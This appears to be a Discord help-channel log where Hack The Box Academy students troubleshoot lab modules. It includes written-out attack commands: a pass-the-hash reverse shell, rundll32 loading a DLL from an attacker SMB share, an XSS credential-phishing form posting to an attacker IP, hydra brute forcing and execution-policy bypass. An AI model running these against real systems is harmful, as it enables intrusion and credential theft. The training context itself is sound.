yes

run cat /etc/issue

you should see the asnwer in the output

it says its not a directory?

you typed it wrong then

do I do a space

oh i see

ok I see 6.1

thx

what else do you see

Parrot Security 6.1 \n \1

you can select the whole text then right click copy then at the bottom of the sceen there is a small clipboard which will open a popup and you can copy the value outside of the browser

thanks yoray that helped genuienly

in this case you should drop the \n which means new line and \1 which I have no idea what it means an escaped character 1

Parrot Security 6.1 \n \1 is how it was typed

I passed it

okay nice

which is good

I have a question

Which VM do you guys advice for new people

Ive heard of ubuntutu and Kali Linux

Ive used ubuntutu more tho but which is best or is it mainly the same?

kali and parrot have most of the tools needed already installed

i use kali because i dont like the parrot look ngl

kk thx man fr

same, its kinda cringe

i suffer thru it for the academy pwnbox just because its turn key

but when with kali are you guys using the xfce interface ?

or custom install?

xfce

xfce all the way

but i prefer my wm to look as close to win95 or w7 "classic mode" as possible

on Password Attacks > Pass the Hash (PtH)

• 0 Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash i have it -Command "powershell -e JABj....."
[+] Command executed with service XMNCTGHBAHUVISEDCUVT on DC01

it shows the command executed but i dont get revrseshell

maybe try another protocol 😉

seem with invoke-smbexec

what?

i dont know why

you're not making any sense

i cant use photo here

so what i'm supposed to do

Anyone for intro to whitebox hacking skills assessment question 2? Can’t seem to get rid of code injection should not be possible, even without sanitization or validation.

i pretty much told you exactly what to do

Does it need to be a real EA user?

What does your error say?

so far I have had several while trying different flags and adding -dc-ip, this is just the latest one. I tried the FQDN as well

Hello! I am currently on Windows Server section on Windows Priv Esc module and I am literally following steps from the page and running smb_delivery in metasploit and then running rundll32.exe on target machine and keep on getting ‘wrong path’ or some error like that. Any insights on what I am doing wrong here?

I would first start with reviewing all the commands need for this attack. If you're certain the others fired off correctly then I'd add -target-ip to see if that helps.

You want to delete your two images and dm me the commands you ran?

need to see the command

I use smb_delivery
Set SRVPort 1234
Run

Then get the command
Rundll32.exe \10.10.14.51\lEzmq\test.dll,0

Then copy/paste that command on windows target machine and its not working

why is the svrport on 1234

If I leave it on 445 the exploit wont work

why

EAccess permission denied

You can DM

is there something else running on port 445?

It shouldnt as I am using pawnbox and not my own Vm

type jobs

No active jobs

send screenshot in dm

<@&861185840277487616>

i have a question im not too sure if i can ask here but when i start a module do I have infinite time to complete it?

you can start/stop it whenever you like and how many times you like

gotcha

thank you for the answer 🙂

and my next question, this is gonna sound dumb probs but if i have a laptop with kali on it does that work for HTB? or do i need to use parrot or your guys' provided workstations. just curious as i prefer kali

but i know parrot has some stuff kali doesnt and obviously vice versa

you are free to use whatever operating system you feel comfortable with

gotcha it doesnt ask for specific parrot stuff i see

I have been using Kali the entire time and have not had any issues

I do have a full ParotOS Security VM as well, I try it out from time to time..

hello i can't get the database en MSSQL from the footprinting module. Someone know what this the good way ?

SQL (ILF-SQL-01\backdoor  dbo@master)> ```

Hello! I want to enter in the world of cybersecurity. Can you guys guide me for my firsts steps? I was thinking about what module/course/path to take as a very beginner in this domain ? If you shortly mention about a certain roadmap i would be gratefull ! Thank you!

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thank you !!

Why is it problem using smbclient with parrOT?

You need to be more specific friendo.

Got something with _NET_LINK, closed the Vm and i aint home so cant check it again.. Could be becouse of using VM / Bridge / Ssh > openvpn ?

hello

how can i resovle htb-student@nixfund:~$ systemctl show dconf.service -p Type
Type=

Hey guys for the Attacking LSASS section in password attacks the files do not show up after rundll32 command

.

Guys I have problem with the large ping to labs from pwnbox and from my host with different VPN configurations. Am I only one with this problem?

Hey in the windows priv escalation interacting with Users i created a scf file named @Inventory.scf with my htb pwn box tun0 ip put inside and started responder in my pwn box and executed that scf but it doestn return any hash in responde

I have a question

How to login in bandit

Using ssh server

Like I am facing an issue

Like permission denied

If you need/want help, please tell us the module and section you are experiencing issues with.

I think Maruf is referring to the 'over the wire' bandit exercises for linux command line familiarization.

it is not HTB related

possibly just the wrong server in his Discord

that would explain much 😅

thanks!

Any help

looks like you need to sudo its trying to access ports 80 and 445, someone metnioned this to you yesterday the first 1000 or so ports are sudo protected

Hi How to fix this proplem in metasploit? The host (10.129.140.80:445) was unreachable.

have you connected via the vpn / provided the correct port?

I connect to vpn on my vm

lport 4444

rport 445

and lhost?

lhost = tun0?

failing that double check your attacker box hasnt expired

yes

107 min left

ping it, that ticker is sometimes wrong... i checked mine yeseterday it said it had 90 something minutes left and it was down to only 3 minutes you might've just started the target box but as a sanity check, best to rule it out

ping and what ip?

ping the attack box ip

ping 10.129.xxx.xxx from terminal

ok

From 10.10.16.1 icmp_seq=4 Destination Host Unreachable

can we see full terminal output please including cmd?

let it run for about 10 seconds

hello, is there another way to finish the web archives modules in Information Gathering - Web Edition ? it needs the wayback machine but the website is down for me

nope its instrumental to the modules

looks like its down for me too, archive.org

so i just need to wait for it to be up again ?

pretty much T_T''

if you're working the fundamentals path just move on for a while

ok thanks for the confirmation ahah

Hi, is there some easy method to transfer assignment files to PwnBox? Because when I login into my academy account in the browser of the PwnBox, then the display iteratively shrink itself and I can't even download the file as the location of the button changes place constantly

using xfreerdp? add /drive:/path/to/share,myShare01

the option args are /drive:<path-to-share>,<shareName> (as you want it to appear in the target)

I dont understand. What share? Why xfreerdp?

I have file at the end of the module to download

Oh you mentioned the display shirnking i thought you were talkign about xfreerdp

soi you can use wget sometimes

i was able to use wget on this latest module i was doing, but that was with a module provided script, most of the time im just like SCP'ing the files to the box, which is another option

Hello folks, I'm practicing my bypass firewalls and IDS/IPs skills with nmap. Can you please suggest any good labs on HTB focusing on this area or any VM or online labs.

Can you check messages with me?

but I guess i would have to be authenticated to use wget. You were providing cookies in the options?

yes thx for the heads up, didnt hear a ding

No, im not sure why the one i did worked, tryign to figure that out, but i did run into the unauth issue you described on all others, just scp them

in the case of scp I would have to open some ports on the firewall?

on the pwnbox?

yes

like e.g using ufw?

scp should run over 22 same as ssh?

Anyone please....

if u can ssh you should be able to scp

you re right. I mentioned opening ports as i assumed the ssh port would be closed by default

No biggie, in real world you certainly would

so i will try what you suggest

right on, you got it?

yes it works, thanks! The credentials stored in the Desktop works for ssh

Look under "Academy x HTB labs" to get box recommendations for each module

Hey, I'm on the footprinting module, SMTP chapter. The second question "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."

I finally found the username after manually testing every name in the given wordlist, But I guess that wasn't the intended way.
I tried smtp-user-enum -M VRFY -U homeworklist.txt -t 10.129.23.36 -v
but this gave no results, I don't understand what was the intended way to solve this

you mean if there is an automated way of testing the word list?

yes

I don’t think there’s much you can practice there, I kind of doubt the bypass part would work in real life like that (you don’t trick a firewall by sending more packets) and I don’t think any box incorporates that topic. Nmap you use on all boxes, but the bypass part is eh

I think msfconsole has a module for that but I havn't tried it out.

<@&861185840277487616>

So that was just it hey? I guess I did okay then
Thanks for answering !

Can someone help with an rdp sanity check on: https://academy.hackthebox.com/module/226/section/2415

the section states that the connection attempt may need to be retried multiple times to get a succesful connection... i've made two attempts at connecting several hours apart, and now with a two rdp services xfree and remmina, neither are working

👀

Yeah I did it manually aswell when I went through the module. I am sure there are ways to automate it

Same error from each rdp client, as well.

└──╼ [★]$ xfreerdp /v:10.129.144.102 /u:htb-student /p:HTB_@cademy_stdnt! /dynamic-resolution
[08:03:42:508] [87682:87709] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[08:03:42:809] [87682:87709] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 164 bytes remaining unhandled. Skipping.
[08:03:42:809] [87682:87709] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[08:03:42:809] [87682:87709] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGR24
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - [0x03] Cache Glyph - SERVER BUG: The support for this feature was not announced! Use /relax-order-checks to ignore
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - order flags 03 failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - update_recv_order() failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - UPDATE_TYPE Orders [0] failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.rdp] - DATA_PDU_TYPE_UPDATE - update_recv() failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
[08:03:42:828] [87682:87709] [INFO][com.freerdp.client.common] - Network disconnect!

what does this do /relax-order-checks

lemme check

on uh, xfree right?

btw try putting the password between ""

or ''

no luck with /relax... i did encap the passoword in quotes, no dice with either i think the module is bugged... hopefully someone can try it and confirm its broke and ill submit a ticket

This is next one after that i finished that yestrday

Yes but any time you access restricted ports you MUST sudo

This is from interacting with usrrs

today, yesterday, tomorrow, it will be the same

I did sudo responder command

something is still not right, regarding your ports, it may not have anything to do with responder

also please copy paste the terminal output, are you using discord on your phone and not on the computer?

your cmds and their output ultimately are going to help far more resolve your problem

I'm working on the Local File Inclusion module: https://academy.hackthebox.com/module/23/section/251.

Can anyone tell me why it’s not returning any values? It doesn't allow me to include files that are locally present on the server. For example, with /etc/passwd, it returns an empty history field.

you working the exercises? if so which one and whats your payload? feel free to DM if you feel like it

ding me here after so i know it came thru, discord isnt maknig an audible alert to DMs for me

👌

Hi. Is it normal that a lot of practical exercises are asking things that I'm not supposed to know yet? For example, I just learned how to create files and directories and move and copy them, but the practical exercise is asking me to identify last modified file and find inode number. I can easily find how to do this on the internet but it's just weird. Is this made to encourage to do some research yourself or am i missing out on something?

yes this happens sometimes, did the section go over ls yet? sometimes it expects you to learn a simple cmd then how to use its granular options ls -lah (on your own)

Hello everyone, I need help with Windows Attack & Defense module, I'm at GPPPassword section but I'm stuck as "running scripts s disabled on this system"

Do I need to regenerate the instance?

You should Google what that means

oh ok, it was that easy

thanks

Yes the previous one was about ls. Ok.

if this is a powershell issue there's a trick i found (instead of having to set-ExecutionPolicy and then unset it later, you can spawn a powershell instance in bypass mode via powershell.exe -ep bypass

this is super thanks

well i didint "find" it, someone here had a one liner that included it and i "found" it helpful

you know what im sayin tho

so is it generally ok using google to solve modules ? trying to avoid answer spoiler

hrm, not really, but if you find yourself stuck on a syntax/priv/operational issue like that, its ok to search around and see if its something not related to the module then get past it

you should utilze whats in the module info primarily, then failing that, google

that said there are several skill assesments and other things where you'll find they want somethng far and beyond whats been mentioned in the module so after exhausting your known info then head to google

Still kinda new and this was my first wall I couldnt figure out alone lol

oh ok, good to know

Hello! I am doing the footprinting course from htb academy, module 112, section 1069 and I have no idea how to find the FQDN of the host were the last octet ends with x.x.x.203, can someone please help me? Thank you!

have you tried nslookup?

or dig?

Yes

Otherwise I wouldn't have asked

Right now I'm trying to bruteforce

usually you share what you've tried in your response

in your question*

anyhow, this usually doesnt work on boxes or modules cause there's no DNS, what you might consider is checking http title via nmap -vv

The question you initially asked is out of scope for the module and something you should already know. You should get comfortable using a search engine closing any gaps the module does not cover. Though if you're having difficulty with what the module is trying to explain there might be a knowledge gap that is covered in a prior module. The module information page should say if there are any prerequisites.

usually the hostname is returned with nmap scan plus the usual fixings -sC -A etc or -vv

Ok, thanks

FQDN is going to be hostname + domain, in case you arent aware. if this is a windows box it'll likely be the ADDS domain, or just a generic TLD for a linux box

i think that section uses a linux box with a generic TLD like .htb

YMMV

Review the section again, it explains how to do it.

What is the best way to review previously compelted modules? I'm going through each one, but the exercises are kind of repetitive, and going through every module takes a while. Open to any suggestions.

Hi, I'm stuck at Infiltrating Windows in the Shells & Payload Module. I'm at the last question where you need to get a shell on the system. However I'm unable to get a meterpreter shell using the eternalblue payload. I also tried to change the payload. Can anyone give me a hint?

I did that

Nothing works

Make sure you're setting your lhost

Thanks for your answer, I already did that. I get the following error message after running the payload: Rex::HostUnreachable: The host (x.x.x.x:445) was unreachable

Something does work, but it's not copy paste from the page, you have to use your noodle a little bit.

Dm which msf exploit you're trying

did you set your payload?

set payload windows/x64/meterpreter/reverse_https

and set your lhost to 0.0.0.0

I managed to get it to work

mind dm'ing me what you did? i'd like to know a "better" way to do it as well.

It had nothing to do with what u said

I had to dig AXFR zones, and figured out a zone allows digging and the other doesn't, and then I went through a lot of word lists for the zone that doesn't allow zone transfer

And found it

oh i see yeah AXFR, beware that rarely if ever works in real world, unless you're dealing with a very poorly configured/misconfigured DNS server, last well known incidident of this was: https://www.sciencealert.com/north-korea-just-accidentally-revealed-it-only-has-28-websites

Next time if you provide details like that when asking a question it makes it easier to provide a better nudge.

Thanks @shut quest

Oh, okey

2016 xd

i am doing footprinting module of smtp done everything seached every thing but cant able to find the answer any help will be apreciated

also used the wordlist that is given in resource tab but unable to

try using a different method in SMTP

there are some that can work

i used metasploit

user enum script and nmap too

be it metasploit or the enum script, you are specifying the way that it enumerate for users, u can change it

lets try that

Too add to that you might be enumerating too fast, it can skip over important things.

so how much timeout i set 5 seconds are defailt

try more, maybe 7 or 10?

tried 10 now with vrfy it didnt worked now trying other

20 is a safe bet

com onnn felassss

You can try less than that if you want

i tried 10 but it didnt wokred

101 entries if i do 20 sec mulitply it

And I said 20 is a safe bet

maybe module is broken

Wait till you get to password brute forcing

I'm looking at the module right now, for right now, you might want to look back at the SMB modules, maybe there's a way to enum domain users?

got it

it took 20 seconds

In the shells and payloads skills assessments, I have all the questions that scans will give me answers for. Are we supposed to just use the standard metasploit modules to do the further questions or are we supposed to do it manually?

That's what this section is about but over smtp

mhmmm

I was trying to figure it out over SMTP and adjust timeout in the meantiem

If you're comfortable doing the exploits manually you can or you can use something like metasploit.

Can I speak to someone from HTB for MSSQL, Exchange, and SCCM Attacks?
I was able to complete the Skills Assessment in a non-intention way. So I just wanted to confirm with you.
Please DM me.

Module: File upload attack
Section: Type filter
Can anyone give me some insights on the upload?
I fuzzed the extension via burp and got positive for ||reverse double like phar.jpg||, still I can't exec any of those

I did modified content type, set the ||GIF8|| string, and tried both _REQUEST and file_get_contents
and yes I did disabled url encoding for all attempts

have u tried to swap the extensions?

Crap

never thought of that

Tunneled visioned
Thanks alot @shell ore

Need some help, I am trying to edit the svg file I made for Limited File Uploads. Which programs allow me to edit them?

using Parrot OS

u can use a normal text editor

Tried using Vim and Pluma, but I'll try it again

SVG is just a text file

just echo the whole thing and pipe and you good to go

I'm doing File Uploads - Skill Assessment and after enumerating the contact page, I can't seem to find any upload functionality. All I got is following form.

    <div class="form-box">
      <h1>Contact Us</h1>
      <p>You may send us your feedback or any inquiries you have.</p>
      <form action="/contact/submit.php" method="get">
        <div class="form-group">
          <label for="name">Name</label>
          <input class="form-control" id="name" type="text" name="Name" required>
        </div>
        <div class="form-group">
          <label for="email">Email</label>
          <input class="form-control" id="email" type="email" name="Email" required>
        </div>
        <div class="form-group">
          <label for="message">Message</label>
          <textarea class="form-control" id="message" name="Message" required></textarea>
        </div>
        <div>
          <p>Attach a screenshot</p>
          <div class="form-group">
            <div class="input-group">
              <div class="custom-file">
                <input name="uploadFile" id="uploadFile" type="file" class="custom-file-input" id="inputGroupFile02" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">
                <label id="inputGroupFile01" class="custom-file-label" for="inputGroupFile02" aria-describeby="inputGroupFileAddon02">Select Image</label>
              </div>
              <button id="upload"><i class="fa fa-upload"></i></button>
            </div>
          </div>
          <p id="upload_message"></p>
        </div>
        <input class="btn btn-primary" type="submit" value="Submit">
      </form>
    </div>
  </main>```
Is this intentional or there's a need for dir brute forcing?

um.
Read again?

Look for unsigned events - $_.Message -notlike 'Signed: true'

CTRL+F

There's a GET /contact/submit.php but it ain't uploading the file as I see it

Ah i see, maybe you need to look for a different place for upload then

hey guys little question im doing the password craking easy lab, i tried bruteforcing the ftp and shh protocol with hydra to find the root password and also tried differend pwd files but can't find the awnser any help or hint?

You won't directly get the root's password. Try brute forcing another user first.

okej gonna see to enumerate something

is the user tha ti have to find in the other section or do i have to find him by enumerations?

You have the wordlists provided in the module.

oh yeah i'm stupid -_- but quick question is there a tool where you can enumerate users from just an ip or not?

i guess no but we never know ^^

You can but in this case you have to brute force.

okej thank you

Is it the right command to go bcs i received nothing?

hey guys i am connectivity issue trying to ping my target machine but ain't getting connected

i am doing information gathering module

dns zone transfer section

i edited my /etc/hosts file but still can't ping

make sure ur vpn server is correct

iirc you don't need the mutated lists for this one just use the plain user/password list you got from the resources. Also try other protocols.

Hello

i am using us academy server which shows low load

doing those 2 after nmap scan its the only ports i saw open

That's weird. You're doing password attacks lab easy right?

wait you already are scanning ftp so wait a while or increase the threads to make it go faster. I used -t 48

yes

19 minutes to go we will see

Any help with this invoke clipboard logger its not running as its shown in the module

Did you import first

CPTS XSS Module -> phishing
https://academy.hackthebox.com/module/103/section/984

How can I add this code document.write('<h3>Please login to continue</h3><form action=http://10.10.15.100><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

To this XSS payload?
'><Html%0dONPoINtERENtEr+=+(confirm)()//

Import module .\Invoke-cliphoard.ps1
I tried this

Before running it

Need to have the payload in a JavaScript file on your local computer for this section to work, as I learned the hard way yesterday

Also, no need to fuzz it — rather simple payload.

found the creds but idk can't find the flag?

i used several methodes to find some config files and all that stuff but nothing? any hint?

Hi guys, I just started in soc analyst path. Right now, I am doing the detection of an umanaged powershell attack question in event logs and finding evil module

My powershell shows Try the new cross-platform PowerShell https://aka.ms/pscore6

This is the command I run:
powershell -ep bypass

Import-Module C:\Tools\PSInject\Invoke-PSInject.ps1
Invoke-PSInject -ProcId 2360 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"

It doesnt change anything in the PID of spoolsv.exe

it doesnt become a managed state

it won't initially. you have to refresh process hacker

DM me which stage you're at now and I'll try to point you in right direction

I will dm you in 30m thanks for you help ^^

bro you just saved me from depression! I refreshed, but it still didn't work. I quit the app and restarted it. It worked!!!

Thanks!

Why are you using a username list? Aren't you given one? Or are you on the section with multiple services to check

nope i tried first with -l root but got nothing on both ports 21 and 22, i tried with list and got some creds but after login im stuck ^^

Ahhh didn't realize what section you were on

Try with user as the username

Always start simple then build complex

Just to be sure what module and section are you on?

passwordcracking module section lab easy

-l user yuo mean?

Password Attacks?

yes my bad

after a scan there is only 21 and 22 avaible

Yeah that's right

And you checked if ftp had anon access yeah?

yup but its not the case

but like i said i used hydra with a username list

and found some creds

i took the ssh key to connect and got connected but i can't find anything on this user (i think)

The basic password list and username list from resources should be fine

Take a lesson in history

uhhh

i took a look at it but didn't pay attention at everything -__

thank you

;)

i knew it was that simple ^^

Get in those habits of quick checklists

yeah i was thinking at it a few minutes ago to try to make an automatization checkup but i need to write it down

No need to automate

no not like a script i mean like basic checks like history, depending on the open ports etc

How did you managed?

Anybody been through the SELinux optional assignment in the Linux Fundamental course?

Stuck on this module for 1 day
Information Gathering - Web Edition
Skill Assessment

i have tried ffuf, gobuster(vhost + dir) but still no result.

get these errors.

i have also add host to /etc/hosts file.

I haven't seen that error personally, is your hosts file correct (still correct?)

what does the command look like

yes

here it is @safe star

try lowering the threads

yeah i have also tried this, the effect of that is just that i did't got any client.timout exceed error

oh duh you're getting replies, except every few thousand or so you get an error, my mistake

maybe its just taking a while to get results

🫠

sounds like it was working without 100 threads

ummh, lemme check without thread

still not found result.

😦

dm me

Feel free to report this to a mod (dm me if you’d like?)

Hi gurus, may I learn what is the alternative to waybackmachine? I am stuck at the Web Archives module as the waybackmachine is down

I got an answer and we just should wait apparently 😬 feel free to come back later to the module

Thanks thanks

Yeah..

But how would I upload that file? Ofc I can host it on a webserver, but I don't think that what's the module is about :-)

@vivid pilot check the man nc.. you have an issue with your command.

idk where I should ask this but does anybody have problem with their VM slowing down the longer they use it and does anyone have a solution? It has pretty good resources dedicated to it.

Hello guys. I am having problem with password Attacks/Attacking LSASS. I extracted logs as insteucted but pypykatz and mimikatz all giving an error. Logon list with mimikatz and pypykatz also giving an error. So, is there any alternative way I can do it. I am stuck in this for 2 days now

Dm the commands

.

Hello guys i am having a connectivity problem on Information gathering module dns zone transfer section i can't even ping the target machine even though i edited the /etc/hosts file still can't able to ping the machine but i can still ping the machine in the skill assessment section but can't in this section can anyone help me?

Read the module again. You're literally instructed to use php -S to host both the JavaScript sender and the PHP stealer.

Yes

Hi

Password Attacks > Pass the Ticket (PtT) from Linux

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

i got svc_workstations@INLANEFREIGHT.HTB ticket klist but i cant creds for svc_workstations anyidea ?

Well to SSH we need a password. Perhaps we need to extract the hash?

maybe try reset the vpn

Hello guys

I just wanna solve my problem

and that is?

Let him cook Sparkles. It's probably hacker for hire.

there are 3 diff modes for aes256 from hashcat 19700 15900 15910

https://hashcat.net/wiki/doku.php?id=example_hashes

hashid -m <hash>

thx all

yeah did it as well

Password Attacks > Pass the Ticket (PtT) from Linux

Q/Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

i have Importing the ccache File into the Session

root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647###########
Default principal: julio@INLANEFREIGHT.HTB

but i cant i tried these

root@linux01:~# smbclient //DC01/julio -k -c 'get julio.txt'
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER

root@linux01:~# smbclient //DC01/julio -k -c 'more julio.txt'
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER

any ideas?

Hello, I'm struggling on attacking common services > Easy.
I found the username f*** with smtp-user-enum. I saw the information on the FAQ of the website (user root on mysql, user daemon on ftp...) but it didn't work. I'm wanting to bruteforce ftp with hydra with the username I found :

hydra -l f*** -P ../resources/pws.list -f ftp://ip_address -o hydra_ftp.txt
but I get the error:
[ERROR] all children were disabled due too many connection errors
Are we not supposed to brute force ftp or is it just that I'm not running the command correctly ?

why not try mysql instead

I tried bruteforcing mysql with hydra but my ip gets banned pretty quickly
I also tried logging in as root as the website's FAQ said but no luck

Anyone have an issue spawning target?

Every time it goes from “target(s) are spawning…” to “Click here to spawn the target system!”

target not spawning?

yeah me.

me too

ahh damn

we are dooomed

i really hate when im in mood to grind for hours, then stuff like this happens.

mine just spawned though, maybe give it a little more time ? Also try to reload the page

Mine also just spawned

What about bruteforcing smtp

Alright, I already tried and since it was taking forever I stopped but apparently that's the way to go, thanks !

same, but not able to interact with the target.

is target working?

Seems so

yeah it is fine now

how to fix this error
System Type: x64-based PC

Are you sure it transferred appropriately? I'd md5 it. sometimes things get janked up in transit.

I think you transferred the wrong executable

Try running it in CMD or run the winPEAS PowerShell script instead

Hey in windoes priv esc module pillage section there is a question to login as jeff via Rdp and find password for restic backup. I try to use a tool Invoke clipboard as mentioned in this section but i cant seem to download it from this machine ive Rdp'd into also i downloaded it into my pwn box and transfer it to this windows machine and use command invoke clipboardlogger that also isnt working any help

Oh, you're on phishing and not session hijacking — hold on…

failing the suggestions described by @dapper moth you may also spawn a new instance of powershell (or cmd) from your evil-winrm session with something like powershell.exe -bypass ep and see if that works

help Password Attacks /Pass the Ticket (PtT) from Linux

whats the problem?

Why don't you read the module again?

Hi guys, im new here. Can i ask a question about a ,module in here

yes

So i am doing the Web Requests Module and POST sub module. i'm having some issues with getting the flag for the question. This is my entry in the terminal: curl -X POST -d '{"search":"flag"}' -b 'PHPSESSID=l7s2oplu127q8fvebhr53ke7dn' -H 'Content-Type:application/json' http://83.136.254.37:40576/search.php
Which should be correct, the cookie is also a valid one that has been authenticated but the response i get is: curl: (7) Failed to connect to 83.136.254.37 port 40576 after 2115 ms: Couldn't connect to server

I pinged the server and it seems to be fine, what am i missing? Thanks for the help

@long linden you around? Im finding myself running into an SCP deal just as you were the other day, turns out i've been using SFTP my whole life (or maybe scp wtih win guis) and im just using it on terminal for the first time wanna make sure i got the syntax right...

scp <local host> <remotehost> SENDS files
scp <remotehost> <localhost> GETS files?

was this your experience?

just as a sanity check, curl the page without all that, just curl the ip+port, and can you visit it in the browser and refresh sucesfully?

aahhh, same issue with both the curl and just enterering the ip+port in browser

have you tried resetting the target

I just did, got the same issue with a new one

I assume this is not an issue on my end right?

are you using pwnbox?

No, VM

if not are you connected to your academy ovpn connection file?

ifconfig tun0

I am not connected to the ovpn no, should i be in this case, nooby question

Yes, you must connect to your academy ovpn connection file (box, academy, etc. are all diff connection files and should be used for their respective activities separately)

Maybe a very simple question but why is it that in some modules i don't per se have to be connected to the ovpn and some i do to find flags?

because in some modules they’re using a public docker ip/port

Thanks for the answer, i have no idea what that is, i will search for what it mean. I will also try it while connecting to the ovpn now

Dont sweat that for now, just always connect to VPN.

You do the fundamentals path and you'll understand what ALL that is, if you're thorough. I guarantee it

@sonic plume you working on mods this morning (UTC -6:00 here)?

huh? i am not a mod

academy mods, modules

Perfect, i am indeed doing all the fundamentals. Thanks for all the help guys, im gonna try it now with connecting to ovpn

ohh, yeah almost every day, whenever i find time to do some. what about you?

correct me if im wrong web requests was near the end of the path, dont skip around! its in order for a reason

same, im force feeding myself the IDS/IPS stuff from the SOC Path currently... all this rule writing and stuff from various IDPS platforms is really grinding my gears

For Http response splitting. I have xss and am able to get my browser to send a request to /?admin but when sending the payload to the admin user I get no response in the log. I checked the hint and have tried local host with common http ports but still no hits. Anyone already don't this able to give me a nudge? Thanks

I went for defensive module and this was one of the lowest level ones because i was a bit bored fried with all of the fundamentals of the "Information Security Foundations". Guess it's time to go back now. I finished half of it by now.

right on, try not to skip around, force feed. join the club!

Hahaha will do!

Good morning guys, I'm Brazilian, do you have any tips with HTB academy too?

whats wrong with wayback machine?

its under attack

it looks like it was breached

or has ben hacked or something

lmao

cant do section

complete whatever

yeah T_T''

Also another thing, i am trying to get a junior position as a Cybersecurity analyst and wondered what is one of the best ways to get there? I recently finished my Google Cybersecurity Professional + Network + cert, studying for Security+ now and after i'll go for Pentest +, OSCP/OSCE. You guys have any tips to expedite and optimize chances to get in? (i'm doing a full carreer switch without any career exp)

may i dm you cuz i tried from vm and pwnbox non of them work

guys my target isn't spawning

what can I do

it's like that for multiple days

clear browser cache/cookies

ok

also are you on public wifi? i noticed when im at the library or coffee shop i cant get certain target boxes to spawn, prob firewall issuse

i am at home

ok thought so just figured id mention

thanks , i cleared everything

still not working

did you logout/login?

ok just a minute

Make sure you understand how each part of your payload needs to be encoded. Also keep in mind that you can use relative URLs instead of absolute URLs to avoid potential port issues. For instance, if you want your XSS payload to hit the path /test on the same site the XSS payload runs on, it is sufficient to specify the URL as "/test" instead of "http://vulnerablesite:1337/test".

unfortunately ,still not working

hello everyone , i am a beginner and trying to learn nmap , in the ids/ips evasion easy lab i am trying to run this scan
sudo nmap <ip adress> -sS -O -D RND:3 -T2
but it isn't yielding me any desired output i.e OS name can someone please put me in the right direction ? it would be really helpful , Thankyou

i am trying to go for a stealth syn attack with decoy for 3 ip headers and slowing it i also tried -f for fragmenting the packets to be even more stealthy but it aint working for me somehow

try -A instead of -O, -A includes -O (to my understanding) but if you're not getting anything try as a sanity check.

oh and i also added -sV and i got
Nmap scan report for 10.129.8.203 (10.129.8.203)
Host is up, received reset ttl 255 (0.30s latency).
All 1000 scanned ports on 10.129.8.203 (10.129.8.203) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: 3Com 4500G switch (92%), H3C Comware 5.20 (92%), Huawei VRP 8.100 (92%), Microsoft Windows Server 2003 SP1 (92%), Oracle Virtualbox (92%), QEMU user mode network gateway (92%), AXIS 2100 Network Camera (92%), D-Link DP-300U, DP-G310, or Hamlet HPS01UU print server (92%), HP Tru64 UNIX 5.1A (92%), Sanyo PLC-XU88 digital video projector (92%)
No exact OS matches for host (test conditions non-ideal).

try to add -Pn too, to treat host as up

ok i will try to run that too but i was avoiding it because it is still an agressive scan and all i need is host

yeah i was noticing your T2 i dont know how the other options come into play with that it was also my understanding that setting the aggressive lower didnt nullify the other options but i could be wrong on that

the scan is legit asking me for 41 mins 💀

yeah, they can get kinda hairy no?

yea legit man imma hope this works

so imma try to run -sS -sV -T2 -Pn -A -f -D RND:3

Thanks!

In the "Attacking Jenkins" module of "Attacking Common Applications", the materials reference a vulnerability that exists in Jenkins 2.150.2 which allows users with JOB creation and Build privileges to execute code on the system via Node.js. Does this exploit refer: "https://www.exploit-db.com/exploits/46352"?

sudo nmap 10.129.150.189 -sS -sV -A -f -D RND:3 -T2 -reason --stats-every=10s -Pn
the above scan is not giving me anything and terminating saying
Unknown address family 0 in build_packet.
QUITTING!

